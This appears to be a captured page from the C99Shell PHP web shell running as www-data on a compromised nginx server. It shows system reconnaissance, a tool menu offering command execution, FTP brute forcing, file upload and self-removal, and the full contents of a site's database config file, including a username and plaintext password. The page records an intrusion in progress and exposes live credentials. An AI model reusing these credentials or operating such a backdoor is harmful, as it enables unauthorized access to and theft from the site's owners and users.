!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/wwwroot/frames/masterflex/   drwxrwxr-x
Free 83.32 GB of 96.73 GB (86.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     faq_config.php (1.13 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    $db_server       
'localhost' ;
    
$db_username     'papyr225_flex1' ;
    
$db_password     '5TYhHe3HqeNp' ;
    
$db_databasename 'papyr225_flex1' ;
    
$lang="english";  // use the name of language file without the extension
                     // example: for french.php use french or for english.php use english

// do not change anything below this line!!!
//------------------------------------------
    
$PHP_SELF$_SERVER["PHP_SELF"];
    
$u_login "false";
    include 
$lang ".php" ;
    
$link mysql_connect($db_server$db_username$db_password) or die("<div style=\"color: red\"><span style=\"font: bold 12pt arial\">" $db_err "</span><br><br>\n<strong>Error:</strong> " mysql_error() . "<br><br>\nBe sure to check the <em>faq_config.php</em> file on your server.</div>");
    
mysql_select_db($db_databasename) or die("<div style=\"color: red\"><span style=\"font: bold 12pt arial\">Either incorrect database name provided or database not present!</span><br><br>\n<strong>Error:</strong> " mysql_error() . "<br><br>\nBe sure to check the <em>faq_config.php</em> file on your server.</div>");
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0043 ]--